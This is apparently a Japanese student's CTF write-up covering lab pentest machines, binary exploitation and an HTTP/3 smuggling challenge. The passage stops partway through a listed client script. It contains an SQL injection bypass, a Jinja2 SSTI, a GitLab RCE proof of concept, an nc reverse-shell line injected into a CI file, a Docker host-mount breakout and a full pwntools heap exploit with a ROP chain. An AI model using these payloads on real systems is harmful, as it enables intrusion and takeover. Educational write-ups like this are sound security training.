2
1

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

FFRI Security x NFLabs. Cybersecurity Challenge For Students 2024 Writeup

Last updated at Posted at 2024-10-06

初めまして,prime_1019 と申します.
9月17日~9月20日に開催された FFRI Security x NFLabs. Cybersecurity Challenge For Students 2024 に参加し準優勝する事が出来ました.せっかくなので Writeup 記事も書いてみようと思います.

運営の方へ

今回,Writeup賞にも応募させて頂いていますが,その締め切りである 10/6 23:59 以降も大幅に追記をしています.
もしルールに差し障る場合,編集履歴から一番最初の版を参照して頂けますと幸いです.
よろしくお願いいたします.

初めに

初めに軽く自己紹介させていただきます.
改めて,prime_1019 と申します.
普段は Hack The Box ばかりやっていて,マシンの攻略や Challenges という実質 CTF の問題を解いたりしてます.

実は CTF の大会に出るのは今回が初めてでした.
常々出てみたいと思っていたのですが, CTF のチーム組める知り合いがいなかったり(ソロでも参加していい事を知らず...),大学の方が忙しかったりでこれまでは出ていませんでした.
今回を機にセキュリティ関係用の X アカウント( https://x.com/prime_1019 )を作ってみたので,是非色んな方と繋がれると嬉しいです.
こちらからもアカウントを見つけられた方はフォローさせて頂きます!

Pentest

[Medium] Gallery

太郎君が撮った写真を公開しているサーバから flag を計二つ取得するのが目標です.
最初の flag は /var/www/flag1.txt にあるとのこと.
とりあえず nmap をかけると,22 番ポートと 80 番ポートが開いている事が分かります.

nmap 結果
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-07 06:08 JST
Nmap scan report for gallery.ctf (10.0.102.82)
Host is up (0.029s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 63:af:de:47:df:5e:15:5c:d1:e7:22:b9:dd:6a:bb:1e (ECDSA)
|_  256 db:b2:93:7a:6b:9e:f4:f2:8e:74:a3:69:45:46:ba:d5 (ED25519)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: My Gallery
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.71 seconds
Web から見ていきます.

Web

image.png
Top ページには太郎君の写真がありますが,その他は特に何もありません.
ffuf でディレクトリを enum すると, admin ディレクトリが見つかります.
image.png
アクセスするとログイン画面へ.
image.png
ユーザー名: admin でいくつか脆弱パスワードを試すもダメだったので,次に SQL インジェクションも疑います.
こちらもいくつか,よくある物をまず試します.
すると 1' or 1=1; -- - が上手く行きました.こちらをユーザー名にしてパスワードは適当に入れておくとログイン出来ます.
image.png
次はファイルアップロードが可能です.
しかし .php 拡張子のファイルは弾かれてしまいます.
その他,.pHp.php5 のようなバイパスも全て弾かれるか,PHP として実行されないのどちらかでした.
少し詰まり,色々検索しているとこのページが見つかりました.
内容は .htaccess がアップロード可能なら,PHP として実行される拡張子を .htaccess 内で設定する事で拡張子制限をバイパス出来るという物.
試してみると .htaccess というファイル名は弾かれないので,これがいけるかも.
.htaccess の中身を次の様にしてアップロードします.

.htaccess
AddType application/x-httpd-php .test

そしてリバースシェルを実行する PHP ファイルを用意し,名前を rev.test に変更してアップロードします.
image.png
アップロードされた場所が分かりませんが,Top ページの太郎君の写真の URL を調べると /upploads/images にある事が分かります.
そこで http://gallery.ctf/uploads/images/rev.test にアクセスしてみると...
image.png
無事リバースシェルが取れました.
flag1 も取得可能です.

www-data@ip-10-0-102-82:/var/www$ cat flag1.txt 
flag{you_exploit_SQLi_and_Uploader}

Privage Escalation

二つ目の flag は /root/flag2.txt にあるとの事です.
一般ユーザーとして yamada がいますので,まずここを目指します.
まだ Web ページでの正規のユーザー名/パスワードが分かっていないので,そちらを狙っていきます.
/var/www/html/admin/login.php の中に DB の認証情報がべた書きされています.
image.png
これを使って DB からユーザー名とパスワードハッシュを取り出します.
image.png
ハッシュをパスワードクラックにかけます.
image.png
yamada のパスワードが割れました.使い回している事を祈ります.
パスワードによる SSH ログインが出来ない設定になっている為,リバースシェル上で su コマンドを実行します.

www-data@ip-10-0-102-82:/var/www/html/admin$ su yamada   
Password: 
yamada@ip-10-0-102-82:/var/www/html/admin$ 

無事 yamada になれました.
sudo -l で何か sudo での実行許可が為されていないか調べると,

yamada@ip-10-0-102-82:/var/www/html/admin$ sudo -l
[sudo] password for yamada: 
Matching Defaults entries for yamada on ip-10-0-102-82:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User yamada may run the following commands on ip-10-0-102-82:
    (ALL) /usr/bin/vim

vim コマンドが実行可能の様ですね.
vim は,その中で任意のシェルコマンドが実行し放題ですから,これで root がとれそうです.
sudo vimvim を起動し,:!cat /root/flag2.txt とコマンド入力.
すると,

:!cat /root/flag2.txt
Press ENTER or type command to continue
flag{vim_is_useful_for_escalating_privilege}

無事 flag2 が得られました.
もうひと手間でシェルも取れます.

この問題は以上です.
.htaccess を用いたバイパステクは抑えられていなかったので,次からはすぐ疑っていきたいです.

[Hard] Labs

革新技術総合研究所のサーバーにペネトレーションテストを行うというシナリオ.
Flag は3つあるようです.
まず nmap をかけると,開いているのは再び 22 番と 80 番ポートのみである事が分かります.

nmap 結果
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-25 03:30 JST
Nmap scan report for labs.ctf (10.0.102.216)
Host is up (0.019s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 47:76:82:25:54:3c:0b:28:77:c1:14:be:36:44:84:12 (ECDSA)
|_  256 bd:e8:bb:af:f5:f4:ff:25:86:db:8a:85:43:89:bd:1a (ED25519)
80/tcp open  http    nginx 1.27.1
|_http-title: \xE9\x9D\xA9\xE6\x96\xB0\xE6\x8A\x80\xE8\xA1\x93\xE7\xB7\x8F\xE5\x90\x88\xE7\xA0\x94\xE7\xA9\xB6\xE6\x89\x80
|_http-server-header: nginx/1.27.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.90 seconds

再び Web から見ていきます.

Web

Web ページ内で怪しいのはお問合せフォームのみだったので,こちらを調べます.
フォームを適当に埋めて送信すると,
Screenshot_2024-09-25_03-42-18.png
この様にフォームで入力した名前がそのまま表示されています.
このような時,自分はまず SSTI を試してみます.
名前を {{ 7*7 }} にして再度送信すると,
Screenshot_2024-09-25_03-48-37.png
49 になって返ってきました.SSTI が刺さってそうです.
後は HackTricks のページ等を参考にテンプレートエンジンの特定を行うと Jinja2 っぽい事が分かります.

(何故か HackTricks には,Jinja2 において {{7*7}} = Error と書いてありますが恐らく誤植です.)
HackTricks に書いてあるように Jinja2 に対する SSTI では RCE が可能なので,これでリバースシェルが得られます.
Screenshot_2024-09-25_04-11-42.png
Screenshot_2024-09-25_04-15-06.png
入った先のディレクトリに flag1.txt があります.

コンテナその①

入った先は Docker コンテナ内の様です.
まず LinPEAS を使って Docker jailbreak 可能な設定等がなされていないか調べてみましたが,特に目ぼしいものはありませんでした.

次に Web root を調べます.
特に .git ディレクトリが在るのが怪しそうです.
実際 .git/config ファイルを見てみると

root@1518b9a89b7a:/app/.git# cat config
[core]
        repositoryformatversion = 0
        filemode = true
        bare = false
        logallrefupdates = true
[remote "origin"]
        url = http://oauth2:glpat-kYuPHTcf4p1aXDUNx3Rz@192.168.0.10/application/contact.git
        fetch = +refs/heads/*:refs/remotes/origin/*
[branch "main"]
        remote = origin
        merge = refs/heads/main

URL の所に認証情報が書いてあります.
次の取っ掛かりはこれっぽいですね.
まず 192.168.0.10 というホストが何者かが気になります.
curl 192.168.0.10 とやってみるとレスポンスが返ってくるので Chisel を使って,ローカルの 8888 番ポートを 192.168.0.10 の 80 番ポートにポートフォワードしてやります.
そしてアクセスしてみると GitLab のログイン画面が出てきました.
image.png
先ほどの認証情報は GitLab 関係の物のようです.
実際 「GitLab glpat」で検索してみると API や レポジトリにアクセスできるトークンである事が分かります.
API ドキュメントを参考にレポジトリ等を enum したり,hooks を悪用できないか色々試しましたがめぼしい物は得られず.
一時間程経ってようやく CVE を調べました.(こういう enum 等色々できる機能があるとついそちらに夢中になってしまって,脆弱性の存在を疑うのが後回しになってしまうのが良くない癖です...)
バージョンは API から取得できて,15.3.0 である事が分かります.
image.png
「GitLab 15.3.0 vulnerability」で検索すると CVE-2022-2884 が出てきました.

API アクセスがあればリモートコード実行できると書いてあるのでこれが使えそうです.
PoC も公開されているので試してみます.
使ったものはこちら.

クローンして実行します.
image.png
required と言われた所を埋めて再度実行.
(COMMAND は,ローカルに建てた Web サーバーにアクセスさせる物にしました.)
しかし,
image.png
このようにエラーが出て上手く行きません.
他にオプションで調整できそうなのは -tn TARGET_NAMESPACE ぐらいなのでここを調べます.
/namespaces という API エンドポイントがあるので投げてみると,
image.png
二つの namespace が返ってきました.
一つ目の m.kobayashi-tn オプションに設定して試してみます.
image.png
今度はエラーは出ず.Web サーバーの方を確認してみると...
image.png
アクセスが来ています!RCE 成功です.
再びリバースシェルします.
image.png
git ユーザーとしてログインしています.
find で探すと flag2.txt が見つかります.

git@git:~$ find / -name flag?.txt 2>/dev/null
find / -name flag?.txt 2>/dev/null
/etc/gitlab/flag2.txt
git@git:~$ cat /etc/gitlab/flag2.txt
cat /etc/gitlab/flag2.txt
flag{Y0U_COMPLETED_HIDDEN_SERVER_RC3!!}

コンテナその②

入った先は再び Docker コンテナでした.
GitLab をホストしているコンテナですから,GitLab 関係をあさるのが良さそうです.
特にまだ GitLab にログイン出来ていないのでそちらを狙っていきます.
ここから少しだけ想定解法と違う動きをしていました.
(想定解法は flag と同じディレクトリに GitLab のアドミンのイニシャルパスワードが置いてあり,それを使ってアドミンユーザーにログインするというものだったのですが,普通に見落としていました.愚か...)
DB をいじってパスワード変更できないかと色々調べていたところ,とても便利なツールがある事が分かりました.
それが GitLab Rails console です.
これを使うと GitLab の設定変更・管理をコンソールを通して簡単に直接行う事が出来ます.
しかも git ユーザーであれば使用可能のようです.
そこで,ドキュメントを参考にしてアドミンユーザー(ユーザー名: root)のパスワード変更を行います.
image.png
これで変更できたはず.
先ほどの GitLab のログイン画面に戻り root でログインします.
image.png
出来ました.

レポジトリをあさると NewWebSiteTest2 に面白そうなファイル .gitlab-ci.yml があります.

.gitlab-ci.yml
# This file is a template, and might need editing before it works on your project.
# To contribute improvements to CI/CD templates, please follow the Development guide at:
# https://docs.gitlab.com/ee/development/cicd/templates.html
# This specific template is located at:
# https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Docker.gitlab-ci.yml

# Build a Docker image with CI/CD and push to the GitLab registry.
# Docker-in-Docker documentation: https://docs.gitlab.com/ee/ci/docker/using_docker_build.html
#
# This template uses one generic job with conditional builds
# for the default branch and all other (MR) branches.

docker-build:
  # Use the official docker image.
  image: docker:24.0.5
  stage: build
  tags:
    - docker-build
  before_script:
    - docker login -u "$CI_REGISTRY_USER" -p "$CI_REGISTRY_PASSWORD" $CI_REGISTRY
  # Default branch leaves tag empty (= latest tag)
  # All other branches are tagged with the escaped branch name (commit ref slug)
  script:
    - |
      if [[ "$CI_COMMIT_BRANCH" == "$CI_DEFAULT_BRANCH" ]]; then
        tag=""
        echo "Running on default branch '$CI_DEFAULT_BRANCH': tag = 'latest'"
      else
        tag=":$CI_COMMIT_REF_SLUG"
        echo "Running on branch '$CI_COMMIT_BRANCH': tag = $tag"
      fi
- docker build --pull -t "$CI_REGISTRY_IMAGE${tag}" .
    - docker push "$CI_REGISTRY_IMAGE${tag}"
  # Run this job in a branch where a Dockerfile exists
  rules:
    - if: $CI_COMMIT_BRANCH
      exists:
        - Dockerfile

冒頭のコメントにもある通りこのファイルでは CI/CD に関する設定が記述されており,このレポジトリに push が入るとファイル中で記述された before_script, script が実行されるようです.
問題はどこでそのスクリプトが実行されるかですが,それを設定しているのが

  tags:
    - docker-build

の部分です.この docker-build が何者であるかはレポジトリの Settings -> CI/CD -> Runners から見る事ができます.
image.png
IP から察するにまた新しいコンテナのようですね!
before_script を変更して再びリバースシェルを取ります.
(GitLab 上で直接編集するとお手軽です.)

.gitlab-ci.yml (変更後)
# This file is a template, and might need editing before it works on your project.
# To contribute improvements to CI/CD templates, please follow the Development guide at:
# https://docs.gitlab.com/ee/development/cicd/templates.html
# This specific template is located at:
# https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Docker.gitlab-ci.yml

# Build a Docker image with CI/CD and push to the GitLab registry.
# Docker-in-Docker documentation: https://docs.gitlab.com/ee/ci/docker/using_docker_build.html
#
# This template uses one generic job with conditional builds
# for the default branch and all other (MR) branches.

docker-build:
  # Use the official docker image.
  image: docker:24.0.5
  stage: build
  tags:
    - docker-build
  before_script:
    - mkfifo /tmp/fg;/bin/sh -i </tmp/fg  2>&1 |nc 192.168.100.10 1236 >/tmp/fg
    - docker login -u "$CI_REGISTRY_USER" -p "$CI_REGISTRY_PASSWORD" $CI_REGISTRY
  # Default branch leaves tag empty (= latest tag)
  # All other branches are tagged with the escaped branch name (commit ref slug)
  script:
    - |
      if [[ "$CI_COMMIT_BRANCH" == "$CI_DEFAULT_BRANCH" ]]; then
        tag=""
        echo "Running on default branch '$CI_DEFAULT_BRANCH': tag = 'latest'"
      else
        tag=":$CI_COMMIT_REF_SLUG"
        echo "Running on branch '$CI_COMMIT_BRANCH': tag = $tag"
      fi
    - docker build --pull -t "$CI_REGISTRY_IMAGE${tag}" .
    - docker push "$CI_REGISTRY_IMAGE${tag}"
  # Run this job in a branch where a Dockerfile exists
  rules:
    - if: $CI_COMMIT_BRANCH
      exists:
        - Dockerfile

注意点として,次のコンテナには bash が無いらしく,いつもの /dev/tcp/IP/port 記法が使えない為,nc を使ったリバースシェルペイロードを用いています.
これを commit すると自動で CI/CD が実行され,シェルが取れました.
image.png

コンテナその③

またコンテナ...ですが,一つ希望があります.
というのもこのコンテナ内では docker コマンドを使える事が先ほどの CI/CD 設定から分かっています.
HackTricks の Docker Breakout の記事にもある通りこの様な場合,ホストマシンの Docker デーモンにアクセスできる可能性があります.

docker images を実行してみると,

/builds/infra/NewWebSiteTest2 # docker images
REPOSITORY                                                          TAG               IMAGE ID       CREATED         SIZE
php                                                                 apache            7fda56f6ac98   5 weeks ago     507MB
labs-contact                                                        latest            90c2981f3884   5 weeks ago     927MB
nginx                                                               latest            5ef79149e0ec   7 weeks ago     188MB
ubuntu                                                              24.04             edbfe74c41f8   2 months ago    78.1MB
python                                                              3.9-bullseye      5e76a2cc4cb1   2 months ago    905MB
docker                                                              24.0.5            7015f2c475d5   14 months ago   335MB
gitlab/gitlab-runner                                                v15.3.0           6e67ae410c31   2 years ago     691MB
registry.gitlab.com/gitlab-org/gitlab-runner/gitlab-runner-helper   x86_64-bbcb5aba   eb09578c5124   2 years ago     58.9MB
gitlab/gitlab-ce                                                    15.3.0-ce.0       2f07246b6539   2 years ago     2.64GB

色々出てきて怪しいです.
ホストマシンのルートディレクトリを /host にマウントしたコンテナを建て,/host/root を見てみます.

/builds/infra/NewWebSiteTest2 # docker run --rm -v /:/host/ ubuntu:24.04 ls -al /host/root/
total 40
drwx------  5 root root 4096 Sep  3 07:20 .
drwxr-xr-x 20 root root 4096 Aug 30 05:23 ..
lrwxrwxrwx  1 root root    9 Aug 30 05:58 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Oct 15  2021 .bashrc
drwx------  3 root root 4096 Aug 30 07:25 .docker
-rw-------  1 root root   20 Aug 30 06:29 .lesshst
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
drwx------  2 root root 4096 Aug 30 05:47 .ssh
-rw-rw-rw-  1 root root 1063 Sep  3 07:20 .viminfo
-rw-------  1 root root   36 Aug 30 07:29 flag3.txt
drwx------  3 root root 4096 Aug 30 05:47 snap

flag3.txt ありました!
これを見れば終わりですが,一応シェルも取っておきました (/root/.ssh/authorized_keys に公開鍵を書きこんで SSH ログイン).

root@labs:~# id
uid=0(root) gid=0(root) groups=0(root)
root@labs:~# cat flag3.txt 
flag{ABUSE_CICD_4ND_D0CKER_PR1V!!!}

これでクリアです.
実際は書いた事以外にも色々と右往左往していて,時間としても8時間程かかってます.
ですがそれは自分の力不足の為で,ラビットホールやエスパー箇所などは一切感じず,自然な流れで解くことができ非常に楽しかったです!

Binary Exploitation

[Medium] Cup

バイナリファイル cup が配布されます.
超大人気オンラインゲーム Cup での対戦が楽しめるとの事...
起動し,必要事項を入力.
image.png
Room password を合言葉にして対戦を行う事が出来ます.
また Room password を空にすると,最近よくこのゲームを遊んでいる FFRAI さんがいつでも相手をしてくれます.
FFRAI さんを倒すと flag が聞き出せるとの事です.
肝心のゲーム内容ですが,
image.png
この様に $X × X$ (画像では $X=3$) 個のカップがあり (F が中身の入ったカップを表す),毎ターン $1$ 以上 $X$ 未満の好きな個数分カップを飲んでいって最初に飲めなくなった方の負け,というものです.
よくある石取りゲームですね.
親切な FFRAI さんはいつも先手を譲ってくれますが,言わずもがな 後手必勝 です.
なので何か悪い事をしないと勝てません.

方針

Cup ではプレイヤーの入力値のチェックをサーバーサイドで行っているようです.
例えば次の箇所です.

len = send(sock,num_of_cups,4,0); // 飲んだカップの数を送信
if (len == 4) {
    len = recv(sock,&server_check,1,0); // サーバーからチェック結果を受信
    if (len == 1) {
      if (server_check == '\0') { // 0 なら問題なし
        // 以下,飲んだカップの座標値を送信

これは手番のプレーヤーが飲んだカップの情報を送信する部分の逆コンパイル結果の一部です.
コメントにあるように3行目でサーバーから,飲んだカップの数についてのチェック結果を受信しています.
例えば飲んだカップの数を 0 にして送信すると,サーバーからは \0 ではなく \x02 が返送され,その後正常なゲームが成り立たなくなります.
しかしチェックの洩れている箇所があります.
それは飲んだカップの座標値です.
逆コンパイル結果全体を見ると分かるのですが,飲んだカップの座標値を送信後にチェック結果を受信する箇所はありません.
ここをついて上手く手番を誤魔化します.

Exploit

実際に Exploit を行っていきます.
今度は,飲んだカップの数及びカップの座標値を受信する処理を見てみます.
(逆コンパイル結果を読みやすく書き直し,例外処理等は全て省略しています.)

unsigned int num_of_cups; // 相手が選んだカップ数
recv(sock, &num_of_cups, 4, 0); // num_of_cups を受信
char *buffer = malloc(X * 2); // カップの座標を書き込むバッファー (X は開始時に選んだボードサイズ)
if(num_of_cups != 0){
    // 座標値の読み込み
    for(unsigned int i = 0; i < num_of_cups; ++i){
        recv(sock, buffer + i * 2 + 1, 1, 0); // i 番目のカップの x 座標(行番号)受信
        recv(sock, buffer + i * 2, 1, 0); // i 番目のカップの y 座標(列番号)受信
    }

    // 盤面情報の更新
    for(unsigned int i = 0; i < num_of_cups; ++i){
        // 「i 番目のカップの状態を表す byte」のアドレス (*cup_addr == '\0' ⇔ 既に飲まれている)
        char *cup_addr = board._8_8_ + (buffer + i * 2 + 1) * X + (buffer + i * 2); 
        if (*choiced_cup == '\0') { // 既に飲まれているカップが選択された
            // 異常終了の処理
        }
        *choiced_cup = '\0';
    }
}

盤面情報の更新において,座標値を参照してアドレス cup_addr を計算し,*cup_addr'\0' でない (つまりまだ飲まれていない) 事を確認した上で '\0' に変更するという処理が行われています.
そこで座標値を調節して,cup_addr が「変えても影響なさそう」かつ「値が '\0' でない」メモリを指すようにします.
結果から言うと x 座標を 0, y 座標を 0x40 にするとこれが達成できます.
(実際に動かしてみてメモリの様子を覗くと分かります.)
また送信する際は自分の盤面情報もメモリを直接いじって整合性を取ります.
以下具体的にやってみます.

  1. gdb cup で GDB を起動

  2. game_loop+605 にブレークポイントを貼る

  3. FFRAI さんと対戦開始 (ボードサイズは3としておく)

  4. 画像の様に左上だけ飲んで,Enter
    image.png
    ブレークポイントで止まる.

  5. x/2g &board とコマンド実行

    結果
    gdb-peda$ x/2g &board
    0x55555555a3f0 <board>: 0x0000000000000003      0x000055555558dcb0
    
  6. x/2g "5 の結果中右側のアドレス" とコマンド実行

    結果
    gdb-peda$ x/2g 0x000055555558dcb0
    0x55555558dcb0: 0x0101010101010100      0x0000000000000001
    

    これが盤面情報にあたります.{char}0x55555558dcb0 == '\0',つまり飲まれている状態になっています.

  7. set {char}0x55555558dcb0=1 と実行
    これで手元の盤面は初期状態.

  8. set {char}$rdx=0x40 と実行
    送信される y 座標値を 0x40 にセットしました (x 座標値は元々 0 なので変えなくてよい).

  9. continue する

  10. こちらの最初の手番が無かった事になり,こちらの必勝形で番が回ってくる!
    image.png

  11. 後は必勝法をやるだけ
    image.png

以上です.
作問者の方曰くいくつか解法があるとの事なのですが,自分はまだこれしか思いついていないのでもう少し考えてみたい所です.
(飲んだカップの数を誤魔化すのも頑張ればいけそう?)
後,いつでもネトゲをしている FFRAI さんの健康が僕は心配です.

[Hard] brownian heap

Heap 問怖い...
Heap にまだまだ慣れておらず,10時間程かかって何とか解けました.
解き方は想定解法とほぼ全く同じだったので,ここではエクスプロイトの共有にとどめたいと思います.

エクスプロイトコード
exploit.py
from pwn import *

addr = "10.0.102.241"

p = process(["nc", addr, "1827"])

p_addr = 0
p1_addr = 0
p1_malloced = 0
libc_base = 0
stack_addr = 0
tcache_addr = 0


def pack8(n: int):
    return n.to_bytes(8, "little")


def ropper(libc_base, popret, binsh, system, ret=None):
    if ret == None:
        ret = popret + 1
    return (
        pack8(popret + libc_base)
        + pack8(binsh + libc_base)
        + pack8(ret + libc_base)
        + pack8(system + libc_base)
    )


def cmd0():
    p.recvuntil(b"cmd: ")
    p.send(b"0\n")


def cmd1(addr):
    p.recvuntil(b"cmd: ")
    p.send(b"1\n")
    p.recvuntil(b"Offset: ")
    p.send(format(addr - p_addr, "x").encode() + b"\n")
    return int(p.recvline()[7:], base=16)


def cmd2(addr, data):
    p.recvuntil(b"cmd: ")
    p.send(b"2\n")
    p.recvuntil(b"Offset: ")
    p.send(format(addr - p_addr, "x").encode() + b"\n")
    p.recvuntil(b"Data: ")
    p.send(format(data, "x").encode() + b"\n")


def cmd3():
    global p1_malloced
    p.recvuntil(b"cmd: ")
    p.send(b"3\n")
    p1_malloced = 0


def cmd4():
    global p1_malloced
    p.recvuntil(b"cmd: ")
    p.send(b"4\n")
    p1_malloced = 1


def cmd5(addr):
    p.recvuntil(b"cmd: ")
    p.send(b"5\n")
    p.recvuntil(b"Offset: ")
    p.send(format(addr - p1_addr, "x").encode() + b"\n")
    return int(p.recvline()[7:], base=16)


def cmd6(addr, data):
    p.recvuntil(b"cmd: ")
    p.send(b"6\n")
    p.recvuntil(b"Offset: ")
    p.send(format(addr - p1_addr, "x").encode() + b"\n")
    p.recvuntil(b"Data: ")
    p.send(format(data, "x").encode() + b"\n")


def leak_libc():
    global libc_base
    off = 0x20
    while 1:
        p.recvuntil(b"cmd: ")
        p.send(b"1\n")
        p.recvuntil(b"Offset: ")
        p.send(format(off, "x").encode() + b"\n")
        fd = int(p.recvline()[7:], base=16)
        p.recvuntil(b"cmd: ")
        p.send(b"1\n")
        p.recvuntil(b"Offset: ")
        p.send(format(off + 8, "x").encode() + b"\n")
        bk = int(p.recvline()[7:], base=16)
        if (
            fd <= 0x655500000000
            and fd >= 0x555500000000
            and bk <= 0x655500000000
            and bk >= 0x555500000000
        ):
            break
        off += 0x10

    cnt = 1
    while 1:
        p.recvuntil(b"cmd: ")
        p.send(b"1\n")
        p.recvuntil(b"Offset: ")
        p.send(format(fd - p_addr + 0x10, "x").encode() + b"\n")
        fd = int(p.recvline()[7:], base=16)
        if fd >= 0x600000000000:
            libc_base = fd - 0x203B20
            print("libc base leaded!: " + hex(libc_base))
            break
        cnt += 1
    return libc_base


def free_p1():
    cmd6(p1_addr - 8, 0x21)
    cmd6(p1_addr + 0x18, 0x21)
    cmd3()
    print("freed p1!")


def set_p1(addr):
    global p1_addr
    if p1_malloced:
        free_p1()
    cmd2(tcache_addr, 0x0007000700070007)
    cmd2(tcache_addr + 0x80, addr)
    cmd4()
    p1_addr = addr
    print(f"p1 addr changed!: " + hex(addr))


def leak_stack():
    global stack_addr
    environ_addr = libc_base + 0x20AD5
    stack_addr = cmd5(environ_addr) - 0x188
    print("stack addr leaked!: " + hex(stack_addr))


def leak_tcache():
    global tcache_addr
    addr = p_addr + (-p_addr) % 0x1000 + 0x10
    while 1:
        if cmd1(addr) == 0x0007000700070006:
            print("tcache addr leaked!: " + hex(addr))
            tcache_addr = addr
            break
        addr -= 0x1000


def rop():
    popret = 0x10F75B
    binsh = 0x1CB42F
    system = 0x58740
    rop_payload = ropper(libc_base, popret, binsh, system)
    for i in range(4):
        cmd6(
            stack_addr + 0x58 + 8 * i,
            int.from_bytes(rop_payload[8 * i : 8 * (i + 1)], "little"),
        )
    free_p1()
    cmd0()


p_addr = int(p.recvline()[4:-1], base=16)
print("p addr: " + hex(p_addr))
leak_libc()
leak_tcache()
libc_writable = libc_base + 0x202000 + 0x2000
set_p1(libc_writable)
leak_stack()
set_p1(stack_addr - 0x1000)
rop()
p.interactive()


AAR/W の幅が int 分しか無いのが絶妙に効いている感じがしました.
Heap 問は解けるか自信が無かったので,解けて非常に嬉しかったです.
怖いと言いましたが冗談で,実際はとても面白く感じているのでこれからも勉強していきたいです.

Web Exploitation

[Medium] HTTP Sunshine

問題は次の通り.

  • パッチのあたった HAProxy が動作しており,その後ろに HTTP Echo Server が動作している
  • client から HAProxy の間の通信は HTTP/1.1, HTTP/2, HTTP/3のいずれか,HAProxy と HTTP Echo Server の間の通信はHTTP/1.1
  • HAProxy は flag を f ヘッダーフィールドとして追加して HTTP Echo Server へリクエストを転送するので,これをリークさせたい
  • パッチは HTTP/3 の処理の際,ヘッダー値に含まれる null 文字や CR, LF 等の特殊文字を見逃す様にしたもの

この設定と問題名から恐らく HTTP Request Smuggling を使いそうとは思いました.
しかし HTTP Request Smuggling は HTTP/1.1 上でしかやった事がなく,HTTP/2 や HTTP/3 はプロトコル自体あまり直接触った事が無かったので色々勉強しながら解きました.
その過程で次の記事を最も参考にさせて頂きました.

HTTP/1.1 へのダウングレード

上記の記事等で勉強した結果,HTTP/1.1 へのダウングレードにおける CRLF インジェクションで解けるのではないかと思いました.
簡単に原理を説明します.
まず通常の HTTP/2 や HTTP/3 ペイロードの例を見てみます.

HEADERS フレーム
:method POST
:scheme http
:authority sunshine.ctf
:path /
content-length 3
foo bar
DATA フレーム
aaa

これらを実際にはバイナリデータの形に直してから送信します.
何となく意味は分かるかと思いますが,これを HTTP/1.1 に直す (ダウングレードする) と次のようになります.

POST / HTTP/1.1
Host: sunshine.ctf
Content-Length: 3
foo: bar

aaa

ヘッダーとボディーをフレームという単位で分けるのが,HTTP/2 や HTTP/3 の特徴的な点の一つです (HTTP/1.1 では 2個続きの CRLF で分けていました).
今回の場合は f ヘッダーフィールドも追加される為,次のようになって Echo Server に送られると考えられます.

POST / HTTP/1.1
Host: sunshine.ctf
Content-Length: 3
foo: bar
f: flag

aaa

そして Echo Server がそのまま返してくれるのは POST データだけなので残念ながら flag は見られません.

CRLF インジェクション

そこで今回の条件「ヘッダー値に特殊文字を入れても良い」を使います.
特に CRLF は HTTP/1.1 においてのみヘッダーとボディーを分けるという重要な意味を持つので,これを上手く用いたい所です.
答えとしては次のようにすれば良さそうです.

HEADERS フレーム
:method POST
:scheme http
:authority sunshine.ctf
:path /
content-length 3
foo bar\r\n
DATA フレーム
aaa

(ただし \r, \n は(印刷不可能文字としての) CR, LF を表します.)
こうすると HTTP/1.1 にダウングレードした時,次のようになりそうです.

POST / HTTP/1.1
Host: sunshine.ctf
Content-Length: 3
foo: bar

f: flag

aaa

ヘッダー foo: bar の後に CRLF が一回余計に入っています.
これで Echo Server は f: flag 以下が POST データであると誤認してくれそうですね.
ただしこのままだと 3 byte 分 (f: まで)しか返してくれないので,flag の長さに応じて Content-Length 及び POST データ aaa の長さを大きくしてやります.

やってみる

以上を実行に移したいのですが,ヘッダー値に CRLF を仕込んで HTTP/3 リクエストするのに非常に時間がかかりました (本来禁じられている事なので当然と言えば当然なのですが).
HTTP/1.1 であれば netcat で繋いで生の HTTP リクエストを書くなりすれば済む話です.
しかし HTTP/3 はバイナリベースかつトランスポート層のプロトコルが QUIC という状況でそんな原始的な方法は中々厳しそう.

既成の HTTP/3 クライアントでやってみます.
まず試したのが curl.
ただし curl の HTTP/3 への対応状況はまだ Experimental という段階なので,普通にインストールされているものでは出来ません.
今回は docker image を用いてやってみました.が,やはり CRLF が入力される事が想定されておらず上手く動作しませんでした.
しかし,現状 HTTP/3 リクエストをある程度いじって投げたい場合はこれが最も手軽?

次に試したのが aioquic です.

こちらは Python の QUIC 及び HTTP/3 ライブラリです.
examples の中に http_client.py があります.これを少し改造しました.
具体的には,ヘッダーの設定を行っている箇所を探し,次のように変更を加えました.
image.png
左がオリジナルで右が改造版です.
229 行目に CRLF インジェクションを含むヘッダーを直接仕込んでいます.
念の為コード全体も付しておきます.

http_client.py
http_client.py
import argparse
import asyncio
import logging
import os
import pickle
import ssl
import time
from collections import deque
from typing import BinaryIO, Callable, Deque, Dict, List, Optional, Union, cast
from urllib.parse import urlparse

import aioquic
import wsproto
import wsproto.events
from aioquic.asyncio.client import connect
from aioquic.asyncio.protocol import QuicConnectionProtocol
from aioquic.h0.connection import H0_ALPN, H0Connection
from aioquic.h3.connection import H3_ALPN, ErrorCode, H3Connection
from aioquic.h3.events import (
    DataReceived,
    H3Event,
    HeadersReceived,
    PushPromiseReceived,
)
from aioquic.quic.configuration import QuicConfiguration
